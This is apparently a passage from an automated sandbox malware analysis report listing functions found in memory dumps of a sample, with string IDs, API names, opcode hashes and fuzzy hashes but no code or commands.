                                                                                                                                                                                                                                                  • Opcode ID: b33f7a74249a1930603a4104fb56ed047204ad8f914d8738a10807f3eb918719
                                                                                                                                                                                                                                                  • Instruction ID: fcb942591893e55783a104e15fa10a8e25e40a6012ded37723e5c7bd10029470
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b33f7a74249a1930603a4104fb56ed047204ad8f914d8738a10807f3eb918719
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3502AB75600701CFD324CF29C891BA2B7F2FF59314F19896DD4968BBA1DB39A841CB44
                                                                                                                                                                                                                                                  Function 00423410 Relevance: 5.4, Strings: 4, Instructions: 415COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1724835535.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1724835535.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SkaKk8Z1J0.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: #$$+oQ$?{;}$DF
                                                                                                                                                                                                                                                  • API String ID: 0-1090792222
                                                                                                                                                                                                                                                  • Opcode ID: fe6da00e438e1ead2a2d23196ddeab5711043166ad0a78cb1c77591abb4d52b2
                                                                                                                                                                                                                                                  • Instruction ID: f8f0a3fc3e126b0df0e9da8d66218e0bc810a6f9e0fb1804998ec3192ea1b230
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: fe6da00e438e1ead2a2d23196ddeab5711043166ad0a78cb1c77591abb4d52b2
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 34E102B4E043549FEB10DF28D942B5EBBB0FB86304F1085ADE598AB381D7758946CF86
                                                                                                                                                                                                                                                  Function 00431839 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 109COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1724835535.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1724835535.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SkaKk8Z1J0.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: MetricsSystem
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 4116985748-3916222277
                                                                                                                                                                                                                                                  • Opcode ID: 39349761bbbd9d5e5dac84a7f5a9780edeb84eb1621c2c8cfd3bf8aab651dcd4
                                                                                                                                                                                                                                                  • Instruction ID: 403ffabe11f23b748e06d840ed2f043dd1bcc1ca5a787c04042f92a2a85d24cf
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 39349761bbbd9d5e5dac84a7f5a9780edeb84eb1621c2c8cfd3bf8aab651dcd4
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 365173B4E142189FDB40EFACE98569DBBF0BB88310F114529E499E7350D734AD48CF96
                                                                                                                                                                                                                                                  Function 0074D25A Relevance: 5.3, Strings: 4, Instructions: 291COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1725073480.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_740000_SkaKk8Z1J0.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: BI$ZG$3ej$pr
                                                                                                                                                                                                                                                  • API String ID: 0-483502859
                                                                                                                                                                                                                                                  • Opcode ID: f72a1af4f7c4914e3558ee5fe4304fc6666decd496300a2b177a412071557166
                                                                                                                                                                                                                                                  • Instruction ID: 9594057fbcd5fde84d3d56d3a71bc0226b0cbb7aa96b3dd28f833929797feef5
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f72a1af4f7c4914e3558ee5fe4304fc6666decd496300a2b177a412071557166
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8CA1A4B52417818FD729CF29C590A62BBF2FF96304B19959DC4D68F766D738E802CB10
                                                                                                                                                                                                                                                  Function 0040CFF3 Relevance: 5.3, Strings: 4, Instructions: 291COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1724835535.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1724835535.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SkaKk8Z1J0.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: BI$ZG$3ej$pr
                                                                                                                                                                                                                                                  • API String ID: 0-483502859
                                                                                                                                                                                                                                                  • Opcode ID: f72a1af4f7c4914e3558ee5fe4304fc6666decd496300a2b177a412071557166
                                                                                                                                                                                                                                                  • Instruction ID: f448791ebc0dd286385b88dc6d7820084d2eda887077436efc4f1c5c77796cf1
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f72a1af4f7c4914e3558ee5fe4304fc6666decd496300a2b177a412071557166
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 44A1D6B56007818FD714CF29C590A22BFE2FF96300B1995ADC4D69F7A6DB38E806CB54
                                                                                                                                                                                                                                                  Function 0075C1AC Relevance: 5.3, Strings: 4, Instructions: 271COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1725073480.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_740000_SkaKk8Z1J0.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: -$C\$Iz$[^
                                                                                                                                                                                                                                                  • API String ID: 0-2105564891
                                                                                                                                                                                                                                                  • Opcode ID: 856b381f3345170c9e1f152739ef8b6d943d9b4d3d608726b0c255f8cc161e2c
                                                                                                                                                                                                                                                  • Instruction ID: ee51b870c7aa0fdfec42bfdec40591af4f652ff5e34f8f26ea4e15d3a8291fbc
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 856b381f3345170c9e1f152739ef8b6d943d9b4d3d608726b0c255f8cc161e2c
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: FA81DEB264C3509FD308CFA9885185FFBE2EFD5304F59C96CF0E58B251D679960A8B82
                                                                                                                                                                                                                                                  Function 00776107 Relevance: 5.3, Strings: 4, Instructions: 253COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1725073480.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_740000_SkaKk8Z1J0.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: T$U$V$k
                                                                                                                                                                                                                                                  • API String ID: 0-1255220828
                                                                                                                                                                                                                                                  • Opcode ID: c93e863c5daac2f8ca78168b26a37bbe867cb239aeeaedccae74f18b85e983c0
                                                                                                                                                                                                                                                  • Instruction ID: 643b34168205318596ad7228e57778d8c292ec65e42ea853cca2e4d2b64aca21
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c93e863c5daac2f8ca78168b26a37bbe867cb239aeeaedccae74f18b85e983c0
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6BA1163110CB908FDB04DB38989422EBFD26BD63A4F198B2DE4EA472D6D679C945C707
                                                                                                                                                                                                                                                  Function 00435EA0 Relevance: 5.3, Strings: 4, Instructions: 253COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1724835535.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1724835535.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SkaKk8Z1J0.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: T$U$V$k
                                                                                                                                                                                                                                                  • API String ID: 0-1255220828
                                                                                                                                                                                                                                                  • Opcode ID: d7e9605b728d24d94aa6476dc2bc71a6c7b696767e3fd5b61d48fe4e4e80319c
                                                                                                                                                                                                                                                  • Instruction ID: 419b7bd8d768cf5a93220c289582c9eeb00d0d40764b4ee896287773b3a375b3
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d7e9605b728d24d94aa6476dc2bc71a6c7b696767e3fd5b61d48fe4e4e80319c
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4CA1043110C7918BD708CB38985022FBBE25BDA324F1A9B2EE4E6473D2D679C945C74B
                                                                                                                                                                                                                                                  Function 004156A0 Relevance: 4.4, Strings: 3, Instructions: 617COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1724835535.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1724835535.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SkaKk8Z1J0.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: in~x$kmbj$ydij
                                                                                                                                                                                                                                                  • API String ID: 0-2624003027
                                                                                                                                                                                                                                                  • Opcode ID: 368771055179ae10f3d8f5d678ba0a53bce91d3d7d6a2510e556935792b0b895
                                                                                                                                                                                                                                                  • Instruction ID: f79569228283954ad57b9a6cc496d73d61da5c1ffc761606bfa780fd5c95cafa
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 368771055179ae10f3d8f5d678ba0a53bce91d3d7d6a2510e556935792b0b895
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A91245B5600A01CFC7248F24D8D16A7BBA2FF96314F18857ED4968B396E738E842CB55
                                                                                                                                                                                                                                                  Function 0075144C Relevance: 4.3, Strings: 3, Instructions: 558COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1725073480.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_740000_SkaKk8Z1J0.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: 0$V$e
                                                                                                                                                                                                                                                  • API String ID: 0-3964817793
                                                                                                                                                                                                                                                  • Opcode ID: c7716370ac8927f06ffe637d3cea15850e05a15dbd07c9effa12d3fdb0013073
                                                                                                                                                                                                                                                  • Instruction ID: 5cc6753aed234506893fc5ea4a4f8ae5cb2d68a414d4c6fcd925554dd9bbf875
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c7716370ac8927f06ffe637d3cea15850e05a15dbd07c9effa12d3fdb0013073
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F022E77260C7808BD324DF3884953AEBBD1ABD5321F594B2DE9E9873D1DB788905CB42
                                                                                                                                                                                                                                                  Function 004111E5 Relevance: 4.3, Strings: 3, Instructions: 558COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1724835535.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1724835535.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SkaKk8Z1J0.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: 0$V$e
                                                                                                                                                                                                                                                  • API String ID: 0-3964817793
                                                                                                                                                                                                                                                  • Opcode ID: 6dcb5663772deb8d7bff43d6a63de0c0026bf66aa36f5c09fa028755ac5763c7
                                                                                                                                                                                                                                                  • Instruction ID: 59230c03b5a3a3693ef44b30c97d38267524f76adfdce6de0efbbb4ceb4d7fde
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6dcb5663772deb8d7bff43d6a63de0c0026bf66aa36f5c09fa028755ac5763c7
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9822E77290C7408BD724DF38C4913AEBBD2ABD5324F194A2EE5E9973D1DA388941CB47
                                                                                                                                                                                                                                                  Function 00426054 Relevance: 4.2, Strings: 3, Instructions: 483COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1724835535.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1724835535.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SkaKk8Z1J0.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: 67$V3R5$dB
                                                                                                                                                                                                                                                  • API String ID: 0-2543814982
                                                                                                                                                                                                                                                  • Opcode ID: 7d6b17f1b35bfbf9a10135164190d2ab3452f23863bf0e0451f9f93f012d59a2
                                                                                                                                                                                                                                                  • Instruction ID: 8517aef1948ed283949bb5420b5e04df083ffcb119de912f7f261172b9a423e3
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7d6b17f1b35bfbf9a10135164190d2ab3452f23863bf0e0451f9f93f012d59a2
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 28F145B5A0C361CBC714DF24E85126BB7E1AF86304F09487EE8C297352D739E905CB5A
                                                                                                                                                                                                                                                  Function 007587DF Relevance: 4.0, Strings: 3, Instructions: 234COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1725073480.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_740000_SkaKk8Z1J0.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: "w+y$?TUV$DX8Z
                                                                                                                                                                                                                                                  • API String ID: 0-3307990326
                                                                                                                                                                                                                                                  • Opcode ID: f9c6fa3e94296cf0f303a5eebcc6256c78eaf4459c267ceffca2c103466db4c7
                                                                                                                                                                                                                                                  • Instruction ID: e309a8b779425c65fd67e9115f3d0d03e63c2d7c15d6ee196d908c3776a957c3
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f9c6fa3e94296cf0f303a5eebcc6256c78eaf4459c267ceffca2c103466db4c7
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1481EF71600712CFC768CF29C890AA6B7F2FF95711B19859DC8824FB65EB78E841CB45
                                                                                                                                                                                                                                                  Function 0074092B Relevance: 3.8, Strings: 3, Instructions: 90COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1725073480.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_740000_SkaKk8Z1J0.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: .$GetProcAddress.$l
                                                                                                                                                                                                                                                  • API String ID: 0-2784972518
                                                                                                                                                                                                                                                  • Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                                                                                                                                                                                                                                  • Instruction ID: 9c445dde4e534040e589f35a84965ab886e8504ae99f5c5bd9517124c3d7562e
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6E316AB6910609DFDB10CF99C884AAEBBF9FF48324F24404AD941A7311D775EA45CFA4
                                                                                                                                                                                                                                                  Function 007599D7 Relevance: 3.7, Strings: 2, Instructions: 1211COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1725073480.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_740000_SkaKk8Z1J0.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: ,)*k$I,~M
                                                                                                                                                                                                                                                  • API String ID: 0-936430989
                                                                                                                                                                                                                                                  • Opcode ID: 33fe9d4cb84d20c875b3126a1f51ea659af71ca5d5df44b5ba46a13c9140ded4
                                                                                                                                                                                                                                                  • Instruction ID: 172511bce8537114cbb32053af73d5c687d9b90ad0983d4275fb5cd5edb73139
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 33fe9d4cb84d20c875b3126a1f51ea659af71ca5d5df44b5ba46a13c9140ded4
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B8824A70608340AFE7148F24D881B6FBBE2EBD6715F288A3CE98547291D7B9DC05CB56
                                                                                                                                                                                                                                                  Function 00419770 Relevance: 3.7, Strings: 2, Instructions: 1211COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1724835535.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1724835535.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SkaKk8Z1J0.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                                                                                                  • String ID: ,)*k$I,~M
                                                                                                                                                                                                                                                  • API String ID: 2994545307-936430989
                                                                                                                                                                                                                                                  • Opcode ID: 6e5cbd4c0569671f9ac2a4ffa403741c4e36febb6378435fdd9cada9aaa80cb0
                                                                                                                                                                                                                                                  • Instruction ID: 1bde8819f6f7b7dbc416330df06e5e5b0ea208d0a860aecc15c429cbd1f7d48d
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6e5cbd4c0569671f9ac2a4ffa403741c4e36febb6378435fdd9cada9aaa80cb0
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: FF8248746093405BD724CF24D890BAFBBE2EBC6714F28892DE4C547392D679DC92CB4A
                                                                                                                                                                                                                                                  Function 00744F17 Relevance: 3.3, Strings: 2, Instructions: 833COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1725073480.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_740000_SkaKk8Z1J0.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: 0$8
                                                                                                                                                                                                                                                  • API String ID: 0-46163386
                                                                                                                                                                                                                                                  • Opcode ID: 1f5ddf3591017bac3152340072b73a16e36c3305254729570d47587b87dca0fe
                                                                                                                                                                                                                                                  • Instruction ID: b237d025432894a4a7020ff3e88be618e59ae827c632089be1c2376e86e0d823
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1f5ddf3591017bac3152340072b73a16e36c3305254729570d47587b87dca0fe
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 277237716087409FD714CF18C880BABBBE1BF98354F54892DF9998B392D379D948CB92
                                                                                                                                                                                                                                                  Function 00404CB0 Relevance: 3.3, Strings: 2, Instructions: 833COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1724835535.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1724835535.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SkaKk8Z1J0.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: 0$8
                                                                                                                                                                                                                                                  • API String ID: 0-46163386
                                                                                                                                                                                                                                                  • Opcode ID: 1f5ddf3591017bac3152340072b73a16e36c3305254729570d47587b87dca0fe
                                                                                                                                                                                                                                                  • Instruction ID: d40c633f6dc63a9644a0400b392de52ca6438bdc0a59f23ad90aea60c423d6c9
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1f5ddf3591017bac3152340072b73a16e36c3305254729570d47587b87dca0fe
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: BC7213716087409FD714CF18C880BABBBE1EB88314F04892EF9899B391D379D948DF96
                                                                                                                                                                                                                                                  Function 0074DF8C Relevance: 3.3, APIs: 1, Strings: 1, Instructions: 320COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1725073480.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_740000_SkaKk8Z1J0.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Uninitialize
                                                                                                                                                                                                                                                  • String ID: PT
                                                                                                                                                                                                                                                  • API String ID: 3861434553-4135314810
                                                                                                                                                                                                                                                  • Opcode ID: 2838c07cfca04fbe2cabb14719c9c0661598261e54099377b9e0bd013184ce3a
                                                                                                                                                                                                                                                  • Instruction ID: 877dd5b438969863a768e62cc50d99e6b7b13ff343ab4251fc5f29839e1e984e
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2838c07cfca04fbe2cabb14719c9c0661598261e54099377b9e0bd013184ce3a
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: DAA1BDB45487818FD7268F39C4A0A62BFE1BF57310B19869CC4E24FB66D379E806CB15
                                                                                                                                                                                                                                                  Function 0040DD25 Relevance: 3.3, APIs: 1, Strings: 1, Instructions: 320COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1724835535.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1724835535.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SkaKk8Z1J0.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Uninitialize
                                                                                                                                                                                                                                                  • String ID: PT
                                                                                                                                                                                                                                                  • API String ID: 3861434553-4135314810
                                                                                                                                                                                                                                                  • Opcode ID: 2838c07cfca04fbe2cabb14719c9c0661598261e54099377b9e0bd013184ce3a
                                                                                                                                                                                                                                                  • Instruction ID: 75a7993a4975897b3fffe1a5d6229db9520caabe5b699855c7cd795a636d0404
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2838c07cfca04fbe2cabb14719c9c0661598261e54099377b9e0bd013184ce3a
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 68A1C0B4508B818FD326CF69C490A22BFE1EF57300B1996ADC4D25F7A6D339E806CB55
                                                                                                                                                                                                                                                  Function 004223B8 Relevance: 3.3, Strings: 2, Instructions: 772COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1724835535.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1724835535.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SkaKk8Z1J0.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: "*B$B*B
                                                                                                                                                                                                                                                  • API String ID: 0-3938277345
                                                                                                                                                                                                                                                  • Opcode ID: ca0737ad3b4449c2b88f5e3ab455cb045f7dc09c4e14c18ef94007a83bd96a02
                                                                                                                                                                                                                                                  • Instruction ID: c0ff169c622c87bee100c6609ea31c9af3570951461718032b7520edbb3c94ef
